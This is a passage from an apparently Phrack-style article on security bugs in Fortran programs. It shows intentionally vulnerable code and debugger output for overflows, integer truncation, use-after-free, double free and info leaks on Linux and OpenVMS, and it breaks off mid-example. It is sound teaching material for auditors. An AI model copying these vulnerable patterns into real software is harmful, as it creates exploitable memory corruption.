+as an integer which means INTEGER(4) by default (thus 4 bytes allocated).
+So cool. Do not forget that we're passing arguments by reference! Yes I
+know, I'm repeating myself. Probably because of my Alzheimer you know.
+
+Anyway, It's really easy to watch it
+
+	-----BEGIN IMPLICIT TYPE 2-----
+	(gdb) disassemble MAIN__ 
+	   [...]
+	   0x080486c1 <+17>:	lea    esi,[ebp-0xa]          ; esi=&B
+	   [...]
+	   0x080486d8 <+40>:	mov    DWORD PTR [esp],esi
+	   0x080486db <+43>:	mov    BYTE PTR [ebp-0x9],0x0 ; A=0
+	   0x080486df <+47>:	mov    BYTE PTR [ebp-0xa],0x0 ; B=0
+	   0x080486e3 <+51>:	call   0x8048790 <set_> ; set(&B)
+	(gdb) disassemble set_ 
+	   [...]
+	   0x08048826 <+150>:	mov    eax,DWORD PTR [ebp+0x8] ; eax=&B
+	   0x08048829 <+153>:	mov    DWORD PTR [esp],ebx
+	   0x0804882c <+156>:	mov    DWORD PTR [esp+0x8],0x4
+	   0x08048834 <+164>:	mov    DWORD PTR [esp+0x4],eax
+	   0x08048838 <+168>:	call   0x8048594 [...]         ; read(&B,4)
+	   [...]
+	(gdb) b *0x080486e3
+	Breakpoint 1 at 0x80486e3
+	(gdb) r
+	[...]
+	Breakpoint 1, 0x080486e3 in MAIN__ ()
+	(gdb) x /x $ebp-0xa
+	0xbffff42e:	0xf5140000
+	(gdb) x /x $ebp-0xa+2
+	0xbffff430:	0xbffff514   <-- A pointer is stored right after B
+	(gdb) nexti
+	 How much do u want to read dude ?
+	1094795585
+	0x080486e8 in MAIN__ ()
+	(gdb) x /x $ebp-0xa
+	0xbffff42e:	0x41414141   <-- We are controling &B[0] up to
+                                         &B[3]
+	(gdb) x /x $ebp-0xa+2
+	0xbffff430:	0xbfff4141   <-- The pointer is corrupted. Our win.
+	[...]
+	-----END IMPLICIT TYPE 2-----
+
+As expected we wrote 4 bytes in a 1-byte buffer overwriting both 'B' and
+the 2 lowest bytes of a pointer with arbitrary values.
+
+
+---[ 3.2 - The number-related issues
+
+In C language, there exists three types of integer related bugs [R6]:
+   1. Signedness bugs
+   2. Truncation bugs
+   3. Integer underflow/overflow bugs
+
+What about in Fortran?
+
+   *) This first class of bugs is quite unlikely as the primary component
+      is missing. Indeed the 'unsigned' concept does not exist in Fortran
+      which means that there is (as far as I can see) almost no way to
+      mistakenly interpret a negative number (integer/real) as a larger
+      than expected positive one.
+
+      However what would appen if we were to call a function in another
+      language defining unsigned numbers like C? Then an integer overflow
+      _could_ happen if the argument was casted. This particular situation
+      is illustrated in Chap 4.
+
+   *) A truncation bug (may) occur when an integer variable is copied into
+      a smaller one. For example, in C copying an int (4 bytes) into a
+      short (2 bytes) which is possible in Fortran.
+
+      Practically speaking such a bug usually occurs when an INTEGER is
+      passed as an argument to a function/procedure which declares its type
+      'smaller' than it actually is.
+
+	-----BEGIN TRUNCATE 1-----
+	$ cat truncate3.f90 
+		LOGICAL FUNCTION IsGood(L)
+		INTEGER(1) :: L
+		IsGood = .TRUE.
+		write(*,*) 'IsGood: size is ', L
+		IF (L > 10) THEN
+			write(*,*) 'Way too long man', L
+			IsGood = .FALSE.
+			RETURN
+		END IF
+		END FUNCTION
+
+		PROGRAM truncate3
+		IMPLICIT NONE
+		INTEGER(4)	:: l
+		CHARACTER(2000)	:: str
+		LOGICAL :: IsGood
+		write(*,*) 'Give me the damn string ...'
+		read(*,*) str
+		l = len_trim(str)
+		write(*,*) 'MAIN_: size is ', l
+		IF (IsGood(l) .EQV. .TRUE.) THEN
+			write(*,*) 'Copying bytes ... :)'
+		END IF
+		END PROGRAM
+	$ gfortran truncate3.f90 
+	$ ./a.out 
+	 Give me the damn string ...
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	 MAIN_: size is           38
+	 IsGood: size is    38
+	 Way too long man   38
+	$ ./a.out
+	 Give me the damn string ...	
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	 MAIN_: size is          520
+	 IsGood: size is     8
+	 Copying bytes ... :)
+	$
+	-----END TRUNCATE 1-----
+
+      In IsGood(), L is declared as an INTEGER(1). To respect the type, the
+      parameter has to be reduced modulo 256 hence the result (520 & 0xFF
+      = 8).
+
+      This is _not_ the only situation involving this type of bug. For 
+      example, consider the following situation:
+
+	-----BEGIN TRUNCATE 2-----
+	$ cat truncate2.f90 
+		PROGRAM truncate2
+		IMPLICIT NONE
+
+		INTEGER(1)	:: l
+		CHARACTER(255)	:: str
+		CHARACTER(10)	:: foo
+
+		write(*,*) 'Give me the damn string ...'
+		read(*,*) str
+		write(*,*) 'Real string size is ', len_trim(str)
+	
+		l = len_trim(str) ! *BUG* *BUG* *BUG*
+		IF (l > 10) THEN
+			write(*,*) 'Way too long man', l
+			STOP
+		END IF
+		write(*,*) 'Copying bytes'
+	
+		! Insecure copy(foo, str)
+		[...]
+		END PROGRAM
+	$ gfortran truncate2.f90 
+	$ ./a.out 
+	 Give me the damn string ...
+	AAAAAAAAAAAAAAAAAA
+	 Real string size is           18
+	 Way too long man   18
+	$ ./a.out 
+	 Give me the damn string ...
+	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+	 Real string size is          180
+	 Copying bytes
+	-----END TRUNCATE 2-----
+
+      In this situation, the programmer made a mistake involving the
+      prototype the len_trim() function (provided by the Fortran API). [R2]
+      specifies that the result returned by the function should be a
+      'default integer' (which means INTEGER(4)) hence the previous bug.
+
+   *) Whenever a language limits the amount of memory allocated for numbers
+      (generally because of hardware constraints), a number under/overflow 
+      is always possible and is _normal_. However not handling this
+      situation _is_ a bug.
+
+      Fortran makes no exception as storage is clearly defined:
+
+	-----BEGIN INT OVERFLOW 1-----
+	$ cat arithmetic.f90
+		[...]
+		INTEGER(1)	:: N1, N2
+
+		write(*,*) 'Give me a number (-128, +127) :'
+		read(*,*) N1
+		N2 = N1 * 16
+		write(*,*) 'N * 16 = ', N1*16, ' or ', N2
+		[...]
+	$ gfortran arithmetic.f90 
+	$ ./a.out 
+	 Give me a number (-128, +127) :
+	5
+	 N * 16 =           80  or    80
+	$ ./a.out 
+	 Give me a number (-128, +127) :
+	12
+	 N * 16 =          192  or   -64    <-- Oops :)
+	$ ./a.out 
+	 Give me a number (-128, +127) :
+	18
+	 N * 16 =          288  or    32    <-- Oops (bis) :)
+	-----END INT OVERFLOW 1-----
+
+Is that all? Not quite son. When auditing the use of numbers in C code,
+you're usually focused on integers (char, int, long, long long) and that
+would essentially be for two reasons:
+
+   *) Floats and double are rarely present in C code or to be fair, usually
+      not in common 'audited' software. Of course there are a few notable
+      exceptions, just use your imagination to find out which ones :)
+
+   *) Floats are usually _not_ related to copy or allocation operations. In
+      C, integers might be used as index, offsets, quantities or even sizes
+      and as such their abuse 'could' induce a memory corruption. There is
+      almost no such danger with floats.
+
+Now consider that things are a little bit different with Fortran. As I told
+you previously Fortran is a math oriented programming language. As such
+REAL, and COMPLEX types are really common not to mention the fact that the
+language itself provides some nice intrinsic functions to play with. This
+itself is sufficient to increase the probability of float-related bug in 
+real life.
+
+Here is a short example of what could happen:
+
+	-----BEGIN REAL OVERFLOW 1-----
+	$ cat float1.f
+		PROGRAM float1
+		REAL :: a, b, x
+		a = 9.7E-30
+		b = -3.9E-30
+		x = a * b
+		write(*,*) 'x = a*b = ',x
+		END PROGRAM
+	$ gfortran ./float1.f
+	$ ./a.out
+	 x = a*b =   -0.0000000    
+	-----END REAL OVERFLOW 1-----
+
+Interesting isn't it? The behavior of REAL is what is described in the
+IEEE-754. As a result, a REAL (float) underflow occurs when a and b are
+multiplied. This ultimately results in x taking the value 0 because of the
+underflow. The program is not able to detect it on runtime whereas an
+exception could/should have been generated. I won't say more about that,
+now use your brain/imagination/drug to go further ;-)
+
+
+---[ 3.3 - The POINTER abuse
+
+While the concept of pointer is somewhat universal, implementations and
+intrinsic limits of this object may completely vary from a language to
+another. For example, while in C you have direct access to the memory, in
+Fortran you don't (at least directly). But you still have a powerful 
+pointer arithmetic and frankly speaking, that's all needs the programmer to
+introduce bugs ;-). Now let's talk about the POINTER.
+
+Note: The POINTER is F90 & later specific but you might find pointers in a 
+few F77 programs which use 'Cray Pointers' [R10]. 
+
+Introduction to POINTER
+-----------------------
+
+In Fortran, a pointer is not a data type but rather a type parameter and
+must be associated with an object of the same type to read/modify it.
+
+Here is a short self-explaining example:
+
+	-----BEGIN POINTER 1-----
+	$ cat pointer1.f90 
+		PROGRAM pointer1
+		INTEGER, TARGET :: a
+		INTEGER, POINTER :: p_a
+		p_a => a                    ! p_a = &a
+		p_a = 1                     ! *p_a = 1
+		write(*,*) a
+		a = 2
+		write(*,*) p_a              ! printf("%d",*p_a)
+		END PROGRAM
+	$ gfortran pointer1.f90 
+	$ ./a.out 
+		   1
+		   2
+	-----END POINTER 1-----
+
+Note that the TARGET parameter is mandatory. Now let's see a more complete
+example:
+
+	-----BEGIN POINTER 2-----
+	$ cat pointer2.f90 
+		PROGRAM pointer2
+		INTEGER, POINTER :: p_a(:)
+		INTEGER, POINTER, DIMENSION(:) :: p_b
+		INTEGER, ALLOCATABLE :: c(:)
+		INTEGER, POINTER :: X(:)
+		ALLOCATE(p_a(5)); p_a = 5
+		ALLOCATE(p_b(4)); p_b = 4
+		ALLOCATE(c(3));   c = 3 
+		X => p_a
+		X(3) = 0
+		write(*,*) p_a
+		write(*,*) p_b
+		write(*,*) c
+		DEALLOCATE(p_a)
+		DEALLOCATE(p_b)
+		DEALLOCATE(c)
+		END PROGRAM
+	$ gfortran pointer2.f90 
+	$ ./a.out 
+	   5           5           0           5           5
+	   4           4           4           4
+	   3           3           3
+	-----END POINTER 2-----
+
+   *) 'p_a' is an integer array pointer.
+
+   *) 'p_b' and 'p_a' are the same kind of object despite the syntax being
+      slightly different (but equivalent in the end).
+
+   *) 'c' is an array whose size is still unknown. The ALLOCATABLE 
+      parameter specifies that memory will be requested before any use. 
+      This is a dynamically allocated array.
+
+   *) ALLOCATE() is the intrinsic function responsible of the allocation.
+      (and yes its calling syntax is _shit_ but let's deal with it)
+
+   *) DEALLOCATE() will free previously requested memory.
+
+The link between ALLOCATE() and the libc allocator is easy to see:
+
+	------------------------------------------------------
+$ ltrace -e malloc,free ./a.out 
+malloc(20)                                                     = 0x087009a0
+malloc(16)                                                     = 0x087009b8
+malloc(12)                                                     = 0x087009d0
+           5           5           0           5           5
+           4           4           4           4
+           3           3           3
+free(0x087009a0)                                                   = <void>
+free(0x087009b8)                                                   = <void>
+free(0x087009d0)                                                   = <void>
+	------------------------------------------------------
+
+This alone is sufficient to prove that malloc (respectively free) and
+ALLOCATE (respectively DEALLOCATE) are 'almost' the same. The difference
+between both is studied in another subsection.
+
+Heap overflows
+--------------
+
+A buffer overflow in an ALLOCATEd area _is_ a heap overflow. Such a bug may
+occur if:
+
+   *) The user is able to manipulate the index used with the array POINTER
+      to perform an out of bound operation:
+
+	------------------------------------------------------
+$ ./bof_array_malloc AAAAAAAAAAAAAAAAAAA
+ INITIAL ARGUMENT = AAAAAAAAAAAAAAAAAAA  [          20 ]
+ ONCE CLEANED :AAAAAAAAAAAAAAAAAAAA
+$ ./bof_array_malloc AAAAAAAAAAAAAAAAAAAA
+ INITIAL ARGUMENT = AAAAAAAAAAAAAAAAAAAA [         141 ]
+ ONCE CLEANED :AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAA
+*** glibc detected *** ./bof_array_malloc: free(): invalid next size [...]
+======= Backtrace: =========
+/lib/tls/i686/cmov/libc.so.6(+0x6b591)[0xb7625591]
+/lib/tls/i686/cmov/libc.so.6(+0x6cde8)[0xb7626de8]
+/lib/tls/i686/cmov/libc.so.6(cfree+0x6d)[0xb7629ecd]
+[...]
+	------------------------------------------------------
+
+   *) The user is able to somehow induce a bug in the allocation either
+      exploiting an arithmetic mistake of the behavior of ALLOCATE
+      (discussed further).
+
+Dangling pointers
+-----------------
+
+By default, pointers are undefined when declared. As a result there should
+not be any reference nor manipulation of these objects until their 
+association. The unfamiliar programmer might be tempted to use the 
+ASSOCIATED() intrinsic function for safety purpose which (un)fortunately is
+a mistake:
+
+	-----BEGIN POINTER 3-----
+	$ cat pointer3.f90 
+		PROGRAM pointer1
+		INTEGER, TARGET :: a
+		INTEGER, POINTER :: p_a
+		write(*,*) associated(p_a)
+		nullify(p_a)
+		write(*,*) associated(p_a)
+		p_a => a
+		write(*,*) associated(p_a)
+		END PROGRAM
+	$ gfortran pointer3.f90 
+	$ ./a.out 
+	 T            <-- *WRONG* :)
+	 F            <-- Right
+	 T            <-- Right
+	-----END POINTER 3-----
+
+   *) p_a is declared and 'undefined' by default.
+
+   *) associated() falsely reports that p_a is associated.
+
+   *) Since the pointer is associated, the programmer can perform 
+      operations and a memory corruption is very likely to appear.
+
+Let's try to understand what's happening:
+
+	------------------------------------------------------
+(gdb) disass MAIN__ 
+Dump of assembler code for function MAIN__:
+   0x080485d4 <+0>:	push   ebp
+   0x080485d5 <+1>:	mov    ebp,esp
+   0x080485d7 <+3>:	sub    esp,0x188
+   0x080485dd <+9>:	mov    DWORD PTR [esp+0x4],0x80488a0
+   0x080485e5 <+17>:	mov    DWORD PTR [esp],0x8
+   0x080485ec <+24>:	call   0x80484c4 <_gfortran_set_options@plt>
+   0x080485f1 <+29>:	mov    DWORD PTR [ebp-0x168],0x8048880
+   0x080485fb <+39>:	mov    DWORD PTR [ebp-0x164],0x4
+   0x08048605 <+49>:	mov    DWORD PTR [ebp-0x170],0x80
+   0x0804860f <+59>:	mov    DWORD PTR [ebp-0x16c],0x6
+   0x08048619 <+69>:	lea    eax,[ebp-0x170]
+   0x0804861f <+75>:	mov    DWORD PTR [esp],eax
+   0x08048622 <+78>:	call   0x80484e4 <_gfortran_st_write@plt>
+   0x08048627 <+83>:	cmp    DWORD PTR [ebp-0xc],0x0   ; p_a == 0 ?
+   0x0804862b <+87>:	setne  al                        ; al = ~(p_a == 0)
+   0x0804862e <+90>:	movzx  eax,al                    ; eax = al
+	------------------------------------------------------
+
+OK OK easy. First p_a is read on the stack then its value is compared with
+0 (NULL). If p_a is not zero then it's supposed associated (ah ah). However
+since the local variable is uninitialized, it could take any value and in
+our case some stack address thereby explaining the bug.
+
+Now more interesting. If operations are performed using p_a on the base of
+the result returned by associated() then an invalid memory dereference may
+occur and depending on whether we can control this address or nor it might
+end up either as a 'Segmentation Fault' or as a perfectly controlled
+arbitrary memory write. I discovered this really interesting issue reading
+a cool website [R7] which details a few other interesting issues that won't
+be discussed in this paper.
+
+Use-after-free bugs
+-------------------
+
+Does the compiler keep track of POINTER object? Will it prevent the
+programmer from misusing them? Let's write an example once more:
+
+	-----BEGIN POINTER 4-----
+	$ cat pointer4.f90 
+		PROGRAM pointer4
+		INTEGER, POINTER :: p1(:)
+		INTEGER, POINTER :: p2(:)
+		ALLOCATE(p1(10))
+		p2 => p1
+		p2 = 2
+		DEALLOCATE(p1)
+		p2 = 3            ! REALLY bad :(
+		END PROGRAM
+	$ gfortran pointer4.f90 -O3
+	$ gdb ./a.out
+	[...]
+	(gdb) disassemble MAIN__ 
+	[...]
+	   0x080485cb <+27>:	mov    DWORD PTR [esp],0x28
+	   0x080485d2 <+34>:	call   0x80484cc <malloc@plt>
+	   0x080485d7 <+39>:	test   eax,eax
+	   0x080485d9 <+41>:	mov    ebx,eax               ; p2 => p1
+	   0x080485db <+43>:	je     0x8048679 <MAIN__+201>
+	   0x080485e1 <+49>:	mov    DWORD PTR [eax],0x2
+	[...]
+	   0x08048626 <+118>:	mov    DWORD PTR [esp],eax
+	   0x08048629 <+121>:	call   0x804849c <free@plt>
+	   0x0804862e <+126>:	mov    DWORD PTR [ebx],0x3   ; BUG!!!
+	[...]
+	-----END POINTER 4-----
+
+So not only does the compiler nothing but still the bug is really there. Oh
+man Fortran is just like C after all :) With that in mind, it's rather 
+obvious that doublefree() are possible and indeed they are:
+
+	-----BEGIN DFREE 1-----
+	$ cat double_free.f90
+		SUBROUTINE check(x,L)
+		CHARACTER, TARGET :: x(L)
+		CHARACTER, POINTER :: p(:)
+		INTEGER I
+		p => x
+		DO I=1,L
+			IF (ichar(p(I)) .lt. ichar('A')) THEN
+				goto 100
+			END IF
+			IF (ichar(p(I)) .gt. ichar('Z')) THEN
+				goto 100
+			END IF
+		END DO
+		RETURN
+
+	100	write(*,*) '[-] Warning argument is fucked !!!'
+		DEALLOCATE(p)    ! If the argument has an invalid character
+                                 ! then it's free()ed.
+		END SUBROUTINE
+
+		PROGRAM double_free
+	[...]
+			call check(q,realsize)
+			write(*,*) '[+] First argument is ', q
+			deallocate(q)  ! Second free()
+	[...]
+	$ ./double_free ACAAAAAAZ
+	 [+] First argument is ACAAAAAAZ
+	$ ./double_free ACAAAAAAZ-
+	 [-] Warning argument is fucked !!!
+	 [+] First argument is AAAAZ-
+	*** glibc detected *** ./double_free: double free or [...]
+	[...]
+	-----END DFREE 1-----		
+
+The shit behind ALLOCATE()
+---------------------------
+
+We all know that in C allocation of a user supplied size can be dangerous
+if not well handled as it can have side effects. Common problems include
+too large request which would ultimately result in a NULL being returned or
+integer overflows in the calculus of the size.
+
+Since ALLOCATE() is no more than a wrapper of malloc() all of these
+problems can occur. However there is an even more vicious one. Let's play a
+little bit:
+ 
+	-----BEGIN ALLOCATE-----
+	$ cat allocate.f90 
+		PROGRAM allocate1
+		IMPLICIT NONE
+
+		INTEGER(1)	:: M1
+		CHARACTER, DIMENSION(:), ALLOCATABLE :: C
+	
+		write(*,*) 'How much objects should I allocate ?'
+		read(*,*) M1
+		ALLOCATE(C(M1))
+
+		END PROGRAM
+	$ gfortran allocate.f90 
+	$ ltrace -e malloc ./a.out 
+	 How much objects should I allocate ?
+	16
+	malloc(16)     <-- Ok                                  = 0x09eed9a0
+	+++ exited (status 0) +++
+	$ ltrace -e malloc ./a.out 
+	 How much objects should I allocate ?
+	0
+	malloc(1)      <-- WTF ???                             = 0x082a69a0
+	+++ exited (status 0) +++
+	$ ltrace -e malloc ./a.out 
+	 How much objects should I allocate ?
+	-20
+	malloc(1)      <-- WTF (again) ???                     = 0x089e99a0
+	+++ exited (status 0) +++
+	-----END ALLOCATE-----
+
+Wait, something is weird. Why is there a malloc(1)??? A short look at GDB
+and we have the following dead listing:
+
+	------------------------------------------------------
+   0x080487fa <+170>:	lea    eax,[ebp-0x9]          ; eax = &M1
+   0x080487fd <+173>:	mov    DWORD PTR [esp+0x4],eax
+   0x08048801 <+177>:	mov    DWORD PTR [esp+0x8],0x1
+   0x08048809 <+185>:	mov    DWORD PTR [esp],ebx
+   0x0804880c <+188>:	call   0x804862c <_gfortran_transfer_integer@plt>
+			                              ; read(stdin, &M1, 1)
+   [...]
+   0x08048819 <+201>:	movzx  edx,BYTE PTR [ebp-0x9] ; edx = M1
+   0x0804881d <+205>:	mov    eax,0x1                ; eax = 1
+   0x08048822 <+210>:	test   dl,dl                   
+   0x08048824 <+212>:	jle    0x8048836 <MAIN__+230> ; if(dl <= 0)
+                                                      ;   malloc(eax)
+   0x08048826 <+214>:	mov    eax,edx
+   [...]
+   0x08048836 <+230>:	mov    DWORD PTR [esp],eax
+   0x08048839 <+233>:	call   0x804865c <malloc@plt>
+   [...]
+	-------------------------------------------------------
+
+So when a null or a negative size is supplied, malloc allocates 1 byte. Why
+such a strange behavior? I must confess that I couldn't find any satisfying
+answer but the most important thing is: if the user can supply a negative
+length then a really tiny allocation is done which is really prone to heap
+corruptions. So nice :)
+
+
+---[ 3.4 - Other interesting bugs
+
+Talking about insecure programming in Fortran would not be complete without
+what's following. Despite not being as important, it might become handy in
+a few situations.
+
+Uninitialised data
+------------------
+
+The first thing to notice is that it's perfectly legal to use variables
+without properly initializing them:
+
+	-----BEGIN UNINITIALIZED 1-----
+	$ cat uninitialized.f90 
+		PROGRAM uninitialized
+		INTEGER :: I, J, XXXX
+		DO I=0,20
+			J = J + 1
+		END DO
+		write(*,*) J, XXXX
+		END PROGRAM
+	$ gfortran uninitialized.f90
+	$ ./a.out 
+	   148818352 -1215630400
+	$ ./a.out 
+	   135645616 -1215855680
+	-----END UNINITIALIZED 1-----
+
+The compiler did not complain whereas J and XXXX were clearly not properly
+set. Thanks to the ASLR we have the proof that there is no default value
+which results in an information leak of the stack.
+
+Information leak
+----------------
+
+There are a lots of possible situations in which an info leak could occur.
+I've found a couple of them and there are probably even more.
+
+   *) The (in)direct access to uninitialized data. This situation is the
+      direct consequence of what was explained previously.
+
+   *) As said in Chap 3.1, in a few situations you will be able to control 
+      the index used to access arrays or strings. Now depending on the 
+      nature of the access (read or write) you will either have an info 
+      leak or a memory corruption.
+
+      The following example is a perfect illustration:
+
+	-----BEGIN LEAK 1-----
+	$ cat leak1.f90 
+		PROGRAM	LEAK
+		INTEGER	:: C(10)
+		C = Z'41414141'
+		DO I=0,size(C)-1
+			write(*,*) C(I)
+		END DO
+		END PROGRAM
+	$ gfortran leak1.f90
+	$ ./a.out 
+		   1   <-- C(0) is out of bounds
+	  1094795585
+	  1094795585
+	  1094795585
+	  1094795585
+	  1094795585
+	  1094795585
+	  1094795585
+	  1094795585
+	  1094795585
+	$
+	-----END LEAK 1-----
+
+   *) Something which is sometimes not well understood is the string
+      initialization. This could turn to our advantage :)
+
+	-----BEGIN LEAK 2-----
+	$ cat leak2.f90 
+		PROGRAM	leak2
+		CHARACTER(len=20) :: S
+		S(1:4) ='AAAA'
+		write(*,*) S
+		END PROGRAM
+	$ gfortran leak2.f90 
+	$ ./a.out 
+	 AAAA....    <-- info leak
+	-----END LEAK 2-----
+
+      The mistake in the previous code was to use an index for 
+      initialization purpose. Indeed the proper way would be to do:
+      S = 'AAAA' which would set the 4 first characters to 'A' and the 16
+      remaining to ' ' (the space character as there is no use of '\0' in
+      Fortran).
+
+      Note that Phrack publications are intrinsically not compatible with
+      info leaks due to 7bits ASCII constraints. OK OK lame joke, forgive
+      me ;-)
+
+                                    ---
+
+---[ 4 - Back to the good ol' OpenVMS friend
+
+For the vast majority of post 80s hackers, OpenVMS is without a doubt a 
+strange beast. It's not UNIX and the DCL syntax seems insane (in fact it is
+as it could take you a while to figure out how to change the current path).
+But contrary to other old and insanely fucked OS like AIX (hey now you have
+a non exec stack! So _impressive_ ... ), it's an interesting challenge to 
+hack it.
+
+People may argue that it's also so specific that you might never cross one
+in your lifetime so why choosing it? Hum. Let's say that:
+
+   *) it's not _that_ rare. Though you may probably not see lots of them on
+      the Internet, there are still a plenty of them in production [R8].
+      
+   *) it's one of the few platforms really using Fortran nowadays. UNIX
+      itself though useful for teaching purpose is not representative.
+
+   *) both the OS, the architecture (alpha, itanium), and the compiler (HP)
+      are different. A differential will help us to find out the bug
+      classes that may be platform dependant.
+
+A recent and interesting blackhat presentation gave the first clues about
+how to exploit basic overflows on this OS [R9]. This will not be repeated
+though the special case of heap overflow is detailed in Chap 4.2.
+
+Notes: 
+
+   *) I tried as much as possible not to refer to the Alpha asm as it's 
+      really ugly (and deadlisting are too much verbose unfortunately). The 
+      readers willing to become familiar with this architecture should read
+      the excellent [R12].
+
+   *) If you want to experiment OpenVMS, I recommend you to play with the
+      excellent "Personal Alpha" which is able to run OpenVMS iso. Another
+      interesting solution is to play with free shells such as the ones 
+      provided by the Deathrow OpenVMS cluster (thx guyz btw) [R20].
+
+---[ 4.1 - Common Fortran bugs .vs. OpenVMS
+
+Let's get straight to the point: almost every type of bugs presented also
+exists with the VMS compiler. However, due to the implementation of the
+language, a few differences exist.
+
+Note: The tests were performed on OpenVMS 8.3 (Alpha architecture).
+
+The stack overflow case
+-----------------------
+
+Let's play with the (slightly modified) 'CAST 2' example:
+
+	-----BEGIN VMS STACK OV 1-----
+$ type cast2.f90
+	SUBROUTINE dump(S)
+	CHARACTER(len=20) :: S
+	S = 'AAAA'
+	write(*,fmt='(A,A)') ' S=',S
+	END SUBROUTINE
+	PROGRAM cast2
+	CHARACTER(len=10) :: X
+	X = 'ZZZZZZZZZZZ'
+	write(*,fmt='(A,Z10)') '\&X=', %LOC(X)
+	CALL dump(X)
+	END PROGRAM
+$ fort cast2
+$ lin cast2
+$ r cast2       
+&X=     40000       <-- the local buffer is _not_ on the stack
+S=AAAA
+	-----END VMS STACK OV 1-----
+
+So there is no crash and the local buffer is not a stack buffer. Let's dig
+a little bit more with the debugger:
+
+	-----BEGIN VMS STACK OV 2-----
+$ r /debug cast2
+[...]
+DBG> go
+&X=     40000
+S=AAAA                
+%DEBUG-I-EXITSTATUS, is '%SYSTEM-S-NORMAL, normal successful completion'
+DBG> dump /hex %hex 40000:%hex 40080
+ 20202020 20202020 20202020 41414141 AAAA             0000000000040000
+ 00000000 00000000 00000000 20202020     ............ 0000000000040010
+ 00000000 00000000 00000000 00000000 ................ 0000000000040020
+[..] 
+	-----END VMS STACK OV 2-----
+
+OK so there is an overflow since 20 bytes are written but it's _not_ a 
+'stack' overflow. Troublesome isn't it? Can we exploit it since we cannot 
+corrupt the saved registers? Hum. I would say that the exploitation of such
+a bug is without a doubt heavily dependant of the context. If metadata can 
+be overwritten then there may be a way to exploit the program, if not it 
+seems quite unlikely... :<  
+
+The implicit typing
+-------------------
+
+Let's quote the "HP Fortran for OpenVMS Language Reference Manual":
+
+                                    ---
+                     Chap 3.5.1.2 Implicit Typing Rules
+
+"By default, all scalar variables with names beginning with I, J, K, L, M, 
+or N are assumed to be default integer variables. Scalar variables with 
+names beginning with any other letter are assumed to be default real 
+variables. [...]"
+                                    ---
+
+As a result, if the documentation is correct, there should be an overflow.
+Let's verify it:
+
+	-----BEGIN IMPLICIT TYPE 3-----
+$ type implicit_typing3.f90
+	SUBROUTINE set(I)
+	write(*,*) 'How much do u want to read dude ?'
+	read(*,*) I
+	END SUBROUTINE
+
+	PROGRAM IMPLICIT_TYPING
+	IMPLICIT NONE
+	INTEGER(1)	:: A, B
+	A = 0
+	B = 0
+	write(*,fmt='(A,Z10),(A,Z20)') ' A=',A , '\&A=', %LOC(A)
+	write(*,fmt='(A,Z10),(A,Z20)') ' B=',B , '\&B=', %LOC(B)
+	CALL set(B)
+	B = B + 140
+	write(*,*) 'A=',A,'B=',B
+	END PROGRAM
+$ fort implicit_typing
+$ lin implicit_typing
+$ r /debug implicit_typing
+[...]
+DBG> go
+A=         0
+&A=     40008                                                          [L1]
+B=         0
+&B=     40000                                                          [L2]
+How much do u want to read dude ?
+2147483647
+A=    0 B= -117                                                        [L3]
+%DEBUG-I-EXITSTATUS, is '%SYSTEM-S-NORMAL, normal successful completion'
+DBG> dump /hex %hex  40000 : %hex 40010
+ 00000000 00000000 00000000 7FFFFF8B ................ 0000000000040000 [L4]
+                            00000000 ....             0000000000040010
+	-----END IMPLICIT TYPE 3-----
+
+    *) Since &A - &B = 8, an overflow of at least 9 bytes would be required
+       to corrupt A from B ([L1],[L2]).
+
+    *) The memory dump proves that the implicit behavior is exactly what is
+       described in the reference manual [L4].
+
+    *) Unless the compiler was smart enough to allocate space on the stack
+       to prepare the manipulation in set(), there is clearly an overflow
+       as B is definitely a 1 byte buffer in the MAIN_() [L3].
+
+The signedness issue
+--------------------
+
+As stated earlier, Fortran's integers are signed which means that it's not
+possible to have signedness bugs unless there is a cast induced by an 
+external function call.
+
+Let's see a short example using the LIB$MOVC3() function wich is similar to
+the memcpy() from libc:
+
+ 	-----BEGIN SIGNED 1-----
+	SUBROUTINE copy(S,L)
+	INTEGER(2) 	L
+	CHARACTER	D(80)  ! Destination buffer
+	CHARACTER*(*) 	S
+	write(*,fmt='(A,Z10),(A,Z20)') ' Len=',L , '\&Len=', %LOC(L)
+	write(*,fmt='(A,Z10),(A,Z20)') '\&D=', %LOC(D), '\&S=',%LOC(S)
+	
+	! This C function will perform the copy	
+	CALL LIB$MOVC3(L,%REF(S),%REF(D))                       [L2]
+	write(*,*) 'D is ', D
+	END SUBROUTINE
+
+	PROGRAM CMOOV
+	CHARACTER(16)  Guard0
+	CHARACTER(80)	S
+	CHARACTER(16)  Guard1
+	INTEGER(2) length
+	
+	write(*,fmt='(A,Z10)') '\&Guard0=',%LOC(Guard0)
+	write(*,fmt='(A,Z10)') '\&Guard1=',%LOC(Guard1)
+	write(*,*) '1. Buffer string?'
+	read(*,*) S
+	write(*,*) '2. String len?'
+	read(*,*) length
+	
+	! Secure check
